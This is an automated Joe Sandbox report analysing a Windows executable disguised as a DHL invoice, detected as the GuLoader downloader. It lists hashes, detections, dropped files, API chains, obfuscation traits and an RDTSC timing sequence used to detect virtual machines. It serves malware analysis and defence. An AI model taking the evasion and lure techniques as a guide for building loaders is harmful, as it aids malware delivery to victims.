Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHLINV000156.exe

Overview

General Information

Sample Name:DHLINV000156.exe
Analysis ID:830443
MD5:4cef4c9b4785b2bc5adcbf1c91185ab9
SHA1:5e00a720edff53c27a6ee5fe4606a42cc2ab3a02
SHA256:0a83a6c897b43357c341190cc93e0310cc8063f4e569853aba1c912ede95229f
Tags:DHLexe
Infos:

Detection

GuLoader
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Generic Downloader
Tries to detect virtualization through RDTSC time measurements
Uses 32bit PE files
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Binary contains a suspicious time stamp
Detected potential crypto function
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • DHLINV000156.exe (PID: 5024 cmdline: C:\Users\user\Desktop\DHLINV000156.exe MD5: 4CEF4C9B4785B2BC5ADCBF1C91185AB9)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\System.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.784930526.0000000004BAA000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: DHLINV000156.exeReversingLabs: Detection: 23%
      Source: DHLINV000156.exeVirustotal: Detection: 22%Perma Link
      Source: DHLINV000156.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: DHLINV000156.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: DHLINV000156.exe, 00000000.00000003.256339747.00000000027C1000.00000004.00000020.00020000.00000000.sdmp, System.dll.0.dr
      Source: Binary string: maintenanceservice.pdb@ 0%P% source: DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: DHLINV000156.exe, 00000000.00000003.256068695.00000000027CC000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.0.dr
      Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: DHLINV000156.exe, 00000000.00000003.256339747.00000000027C1000.00000004.00000020.00020000.00000000.sdmp, System.dll.0.dr
      Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: DHLINV000156.exe, 00000000.00000003.256068695.00000000027CC000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.0.dr
      Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.dr
      Source: Binary string: maintenanceservice.pdb source: DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_004062DD FindFirstFileA,FindClose,0_2_004062DD
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004057A2
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

      Networking

      barindex
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\System.dll, type: DROPPED
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: DHLINV000156.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: DHLINV000156.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://ocsp.thawte.com0
      Source: DHLINV000156.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
      Source: DHLINV000156.exeString found in binary or memory: http://s.symcd.com06
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://s2.symcb.com0
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://sv.symcd.com0&
      Source: DHLINV000156.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
      Source: DHLINV000156.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
      Source: DHLINV000156.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://www.nero.com
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://www.symauth.com/cps0(
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drString found in binary or memory: http://www.symauth.com/rpa00
      Source: DHLINV000156.exe, 00000000.00000003.256068695.00000000027CC000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.0.drString found in binary or memory: https://aka.ms/dotnet-warnings/
      Source: DHLINV000156.exe, SolutionExplorerCLI.dll.0.drString found in binary or memory: https://d.symcb.com/cps0%
      Source: DHLINV000156.exe, SolutionExplorerCLI.dll.0.drString found in binary or memory: https://d.symcb.com/rpa0
      Source: DHLINV000156.exeString found in binary or memory: https://d.symcb.com/rpa0.
      Source: DHLINV000156.exe, 00000000.00000003.256339747.00000000027C1000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.256068695.00000000027CC000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.0.dr, System.dll.0.drString found in binary or memory: https://github.com/dotnet/runtime
      Source: DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.drString found in binary or memory: https://mozilla.org0
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr, libpkcs11-helper-1.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040523F
      Source: DHLINV000156.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: System.Security.Cryptography.X509Certificates.dll.0.drStatic PE information: No import functions for PE file found
      Source: DHLINV000156.exe, 00000000.00000003.256792075.00000000027C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepkcs11-helper-1.dll" vs DHLINV000156.exe
      Source: DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemaintenanceservice.exe0 vs DHLINV000156.exe
      Source: DHLINV000156.exe, 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs DHLINV000156.exe
      Source: DHLINV000156.exe, 00000000.00000003.256339747.00000000027C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dll@ vs DHLINV000156.exe
      Source: DHLINV000156.exe, 00000000.00000003.256068695.00000000027CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.X509Certificates.dll@ vs DHLINV000156.exe
      Source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolutionExplorerCLI.dll vs DHLINV000156.exe
      Source: DHLINV000156.exeBinary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs DHLINV000156.exe
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403235
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_004066660_2_00406666
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_73EF1A980_2_73EF1A98
      Source: DHLINV000156.exeStatic PE information: invalid certificate
      Source: percentile.dll.0.drStatic PE information: Number of sections : 19 > 10
      Source: libdatrie-1.dll.0.drStatic PE information: Number of sections : 11 > 10
      Source: libpkcs11-helper-1.dll.0.drStatic PE information: Number of sections : 12 > 10
      Source: System.dll.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: C:\Users\user\Desktop\DHLINV000156.exeProcess Stats: CPU usage > 98%
      Source: DHLINV000156.exeReversingLabs: Detection: 23%
      Source: DHLINV000156.exeVirustotal: Detection: 22%
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile read: C:\Users\user\Desktop\DHLINV000156.exeJump to behavior
      Source: DHLINV000156.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\DHLINV000156.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403235
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\GhettoJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile created: C:\Users\user\AppData\Local\Temp\nsiB88.tmpJump to behavior
      Source: classification engineClassification label: mal64.troj.evad.winEXE@1/10@0/0
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,0_2_00402138
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_004044FA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004044FA
      Source: DHLINV000156.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: DHLINV000156.exe, 00000000.00000003.256339747.00000000027C1000.00000004.00000020.00020000.00000000.sdmp, System.dll.0.dr
      Source: Binary string: maintenanceservice.pdb@ 0%P% source: DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: DHLINV000156.exe, 00000000.00000003.256068695.00000000027CC000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.0.dr
      Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: DHLINV000156.exe, 00000000.00000003.256339747.00000000027C1000.00000004.00000020.00020000.00000000.sdmp, System.dll.0.dr
      Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: DHLINV000156.exe, 00000000.00000003.256068695.00000000027CC000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.0.dr
      Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.dr
      Source: Binary string: maintenanceservice.pdb source: DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.dr

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.784930526.0000000004BAA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_73EF2F60 push eax; ret 0_2_73EF2F8E
      Source: libdatrie-1.dll.0.drStatic PE information: section name: .xdata
      Source: libpkcs11-helper-1.dll.0.drStatic PE information: section name: .xdata
      Source: maintenanceservice2.exe.0.drStatic PE information: section name: .00cfg
      Source: percentile.dll.0.drStatic PE information: section name: .xdata
      Source: percentile.dll.0.drStatic PE information: section name: /4
      Source: percentile.dll.0.drStatic PE information: section name: /19
      Source: percentile.dll.0.drStatic PE information: section name: /31
      Source: percentile.dll.0.drStatic PE information: section name: /45
      Source: percentile.dll.0.drStatic PE information: section name: /57
      Source: percentile.dll.0.drStatic PE information: section name: /70
      Source: percentile.dll.0.drStatic PE information: section name: /81
      Source: percentile.dll.0.drStatic PE information: section name: /92
      Source: System.Security.Cryptography.X509Certificates.dll.0.drStatic PE information: 0xF15766E0 [Tue Apr 22 20:30:24 2098 UTC]
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_73EF1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_73EF1A98
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Glitteringly\pinckneya\Administrerbarest\Fyringssedlens\SolutionExplorerCLI.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\percentile.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Supergallantness\afstres\Archives\Sadelmagernaalenes\System.Security.Cryptography.X509Certificates.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\maintenanceservice2.exeJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\libdatrie-1.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\libpkcs11-helper-1.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile created: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\DHLINV000156.exeRDTSC instruction interceptor: First address: 00000000052E8EB2 second address: 00000000052E8EB2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F1928A5263Eh 0x00000006 test dh, FFFFFFDEh 0x00000009 test ah, bh 0x0000000b inc ebp 0x0000000c test edx, edx 0x0000000e inc ebx 0x0000000f cmp cx, B6FAh 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\DHLINV000156.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Glitteringly\pinckneya\Administrerbarest\Fyringssedlens\SolutionExplorerCLI.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\percentile.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Supergallantness\afstres\Archives\Sadelmagernaalenes\System.Security.Cryptography.X509Certificates.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\maintenanceservice2.exeJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\libdatrie-1.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\libpkcs11-helper-1.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_004062DD FindFirstFileA,FindClose,0_2_004062DD
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004057A2
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
      Source: C:\Users\user\Desktop\DHLINV000156.exeAPI call chain: ExitProcess graph end nodegraph_0-4670
      Source: C:\Users\user\Desktop\DHLINV000156.exeAPI call chain: ExitProcess graph end nodegraph_0-4830
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
